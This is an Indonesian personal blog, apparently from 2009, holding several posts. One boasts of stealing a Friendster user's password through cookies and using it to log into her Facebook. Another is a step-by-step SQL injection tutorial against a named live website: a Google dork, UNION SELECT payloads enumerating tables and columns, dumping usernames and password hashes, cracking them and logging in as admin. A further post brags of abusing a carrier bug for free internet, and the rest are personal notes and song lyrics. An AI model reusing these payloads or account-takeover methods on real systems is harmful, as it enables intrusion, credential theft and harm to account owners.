login friendster = login facebook ?
what the BACK!!!
saya ol lagi dan menjalani hidup seperti biasanya (?)
Ok, karena ol saya kali ini ga jelas jeluntrungannya maka timbul niat sayah buat mencoba ato tepatnya mensurvey hal bodoh (lagi), jadi gini :
sekarang tu kan lagi hot2nya (emang apaan aja...HOT) anak2 mude jaman sekarang pada maen facebook (baca : fesbuk),nah...berdasarkan penelitian yang dilakukan di kurosystem corp (sumpah yang ini ngawur abis!!) bahwa antara periode desember 2008 - sekarang banyak pengguna friendster yang beralih ke facebook! ga percaya?? sama...saya juga nggak!
karena pada pindah ke facebook, saya yang seekor yang bisanya cuma ikut2an, ya ikutan juga deh akhirnya, pindah ke facebook!
wew...singkat cerita si sayah kan kadang2 masih maen ke friendster juga, dan masih ada aja loh korban2 dari jebakan di cookie fs sayah...hehe! berbekal cookie ini pun sayah melakukan hal iseng (seperti biasanya). sayah coba take over salah satu account fs (dan tentu mengembalikannya lagi, karena cuman pengen dapetin email + password si korban doang) hehe (anak yang baik jangan tiru ini ya...yang sedang penulis lakukan saat ini adalah contoh dari anak yang sangat baik sekali! :D).
Okeh back to topic...
singkat cerita, THE END! (ya nggak lah...)
jadi abis dapetin email + password salah satu korban yang kita samarkan saja namanya menjadi "Mawar" (busyet...kenapa mesti mawar ya? biarin dah...lagi pengen aja. :D). eits, sebelum menelisik lebih lanjut lagi, ada satu pertanyaan...ko saya milih si "Mawar" buat dijadiin sapi percobaan? jadi gini, setelah liat profile fs si "Mawar" ini saya melihat tulisan di about me-nya, ya kira2 kaya gini : "add facebook gw juga yah disini [sensor]@[sensor].com", wew...setelah diliat ternyata email friendster si "Mawar" dan email facebook yang dia tawarin buat di add tu SAMA! waha...dalam pikiran saya ni yah, sapa tau aja password buat kedua email ini ternyata juga sama! :D
dan setelah memasukkan data si "Mawar" yang didapet dari hasil take over via account-nya dari friendster ke halaman login facebook-nya, dan klik login.....WALAAAA!!! MASUK LOH!!! Jiakakkakaka...
beneran aja lho ternyata, email + pass si "mawar" yang ada di friendster ternyata sama dengan yang dia pake buat login facebook-nya. :D
sebenernya ada niat buat ngacak2 tu isi facebook si "Mawar" sekaligus membubuhkan nama perusahaan sayah (hueeek...) di facebooknya, tapi begitu sadar kalo hal itu terlalu kekanak2an, sayah pun logout saja dari account facebook si "Mawar".....the end
Kesimpulan : ternyata kalo kita bisa dapetin password via friendster, kemungkinan besar diatas 50% peluang kita buat bisa login juga di facebook dengan email + password yang sama...hihihi
Tidak percaya?? percayalah!!! (terinspirasi Ripley Believe It Or Not....heheheheh)
Pesan Moral : Umm...cari sendiri deh, ato silakan aja posting comment-nya yah! Tengkyu...Mmuuah! :D
SQLi by kurosystem
kaya-nya udah lama ga posting tutorial, ngepost tentang tutorial lagi ah...
wokeh, beberapa posting sebelumnya saya pernah bahas tentang dasar2 sql injection...
sekarang dipostan saya kali ini bakal langsung peng-aplikasian-nya a.k.a TERJUN KE LAPANGAN! :D
NB : lebih baik sebelum baca yang ini liat dulu posting saya sebelum ini,yang ini:
http://diary-kuro.blogspot.com/2009/02/dasar-sql-injection-by-newbie.html
biar nyambung..hehe
yang udah, langsung aja...cari site indo aja ya? hoho...
okeh, kita cari dork digoogle-nya pake : "news_detail.php?id= site:id"
NB : tu kita pake "id" karena mo nyari site indo
*cari sana sini...cek sql injection atu2...akhirnya dapet*
http://www.m-wizard.biz/news_detail.php?id=3
next...cari batas jumlah table database sekaligus magic number-nya...
http://www.m-wizard.biz/news_detail.php?id=-3 union select 1,2,3,4--
dah dapet tu...enter dah!
hoho..angka yang keluar cuman 1, 1! :D
sekarang kita liat tabel2 yang ada didalam databasenya. caranya?
perintah yang sayah pake bwt ngluarin tabel adalah :
group_concat(table_name)
ama
from information_schema.tables where table_schema=database()
masukkan group_concat(table_name) pada magic number yang udah dikeluarin tadi (yang tadi kita dapet = 1)
dan from information_schema.tables where table_schema=database() ditaroh dibelakang
jadinya gini nih :
http://www.m-wizard.biz/news_detail.php?id=-3 union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()--
nah tu keliatan dah tu semua table yang ada di databasenya,disini yang kita cari table yang berisi user ma pass! (tujuan kita...hehe)
diantara table2 yang keluar disitu ada table user_t...(karena dicurigai memiliki data pass ma user! :D)
kita akan ngeluarin column yang ada didalam table user_t ini
sebelumnya kita konvert table user_t menjadi hexa dulu...hasilnya : 757365725F74
NB : buat konvert dari string ke hexa klik aja disini
lalu kita keluarin columnnya, caranya?
perintah yang sayah pake bwt ngeluarin column-nya adalah :
group_concat(column_name)
ama
from information_schema.columns where table_name=*HEXA DARI NAMA TABELNYA*
http://www.m-wizard.biz/news_detail.php?id=-3 union select group_concat(column_name),2,3,4 from information_schema.columns where table_name=0x757365725F74--
*HEXA DARI NAMA TABELNYA* disini udah diganti...jadi user_t yang tadi udah kita rubah dari bentuk user_t (string) jadi bentuk 757365725F74 (hexa)
nah..keliatan deh column yang ada di tabel user_t
langkah selanjutnya,kita keluarin deh data2 dari column user_id,user_password,user_name....hehe! caranya ganti column name jadi column2 yang udah muncul tadi, dan dibagian akhir kita ambil langsung ke nama tabel-nya (user_t) jadi gini:
http://www.m-wizard.biz/news_detail.php?id=-3 union select group_concat(user_id,0x3a,user_password,0x3a,user_name),2,3,4 from user_t--
woho...liat yang ada disitu! xixiixixix....
selanjutnya tinggal cari login admin-nya,,disini kita tinggal kira2 aja deh...dan login sebagai admin/webmaster disitu...dan kalo bentuk password-nya dlm bntuk md5 ya di-crack dulu... :D
thx to bang :
GOOGLE,incomp13te,Xshadow,indounderground,yadoy666,dll...(masi banyak) hehe..
Next Project : belajar tentang RFI (Remote File Inclusion), doain yak...:D
lagi2 online dengan sebuah bugs.... :D
sebuah kartu selular ternama masih saja terdapat bugs yang memungkinkan saya untuk bisa ol (ga diwarnet lagi) hehehehe...
emang sih, koneksinya lemot abis.....tapi selama itu gratis, no problemo! hahahaha
biar lebih dramatis,,sekali lagi deh....GRATIS!
tapi sori ga dikasih tau dah bugs yang mana, daripada ntar abis saya post disini si empunya bugs ini ngerasa mening didiemin aja deh,,,saya nikmatin aja dulu! hehehehe....
cuman pengumuman aja! ehehe!
proyek ganti layout fb?
6 bulan = setengah tahun
karena tepat tgl xx februari kmren (interval 10-20) seekor kuro membuktikan bahwa selama 6 bulan terakhir ini manusia ini laku sebagai manusia yang tidak sendiri (lho?), ya..selama 6 bulan ini seekor kuro memiliki seorang yang berarti dalam hidupnya (selain ortu, teman, dan si Bejo flash disk hijau 1gb kesayangan-nya. hehehe). ya...seorang akhwat (bukan ibunya) selama ini telah mendampingi hidupnya selama 6 bulan lebih x hari sehingga menciptakan kehidupan yang subhanallah dan lebih bersinar (soalnya dibawah neon) disetiap dia menjalani hari2nya sebagai seekor kuro yang baik dan benar.
karena ga ada kerjaan pula seekor sayah ngeposting hal ini dan berharap ada beberapa orang ga da kerjaan buat baca dan mendoakeun kelanggengan hubungan si kuro dengan si akhwatyang sangat beruntung ini mendapatkan seekor kuro yang baik hati nan pandai menabung di WC ini. huhuhuhuhu *dilempar sepatu*
karena baru sadar kalo saya baru aja nge-posting blog sebanyak 3 paragrap terakhir dengan selalu di awali kata "karena" dan merasa bahwa seekor sayah agak bodoh juga kalo meneruskan kebodohannya terus menerus selama 5 waktu kedepan (?) saya akhirkan saja postingan ini dengan HAMDALLAH!!
karena itu lewat postingan ini...saya minta dukungan-nya! caranya gampang....kirimin pulsa sebanyak2nya ke no hp sayah! *dilempar ensiklopedi*
karena...UDAH AH! heheh...
bangkit!
liriknya keren + bener2 bisa ngebangkitin semangat orang putus asa kaya saya!!
huahauhauahuahua.....
Menantang hari coba tuk temui semua rasa benci dan segala aral menanti
Blah! bosan ku melihat semua pecundang, membabi buta teriak tanpa alasan
Menghabisi teman puh! ludahi kawan, merasa benar memaksa semua ambisi
Bangkit berontak, tak kuasa terus berdiam diri
Disni ku melawan, takkan ada lagi korban
Tarik kembali, semua hakikimu yang paling hakiki, dan tanpa ternoda
Bangkit, Bangkit
Raihlah semua kembali
Bebaskan gerak diri
Melangkah dengan pasti
Bangkit Bangkit
Temukan semua yang tlah hilang dan takkan lepas
Takkan ku lagi berdiam diri, coba tuk akhiri, segala yang kualami
Bangkit berontak, tak kuasa terus berdiam diri
Disini ku melawan takkan ada lagi korban
Tarik kembali semua hakkmu yang paling hakiki
dan tanpa ternoda
Bangkit! Bangkit!
Raihlah semua kembali!
Bebaskan gerak diri!
Melangkah dengan pasti!
Bangkit! Bangkit!
Raihlah semua kembali!
Mantapkan semua dalam diri ..go!!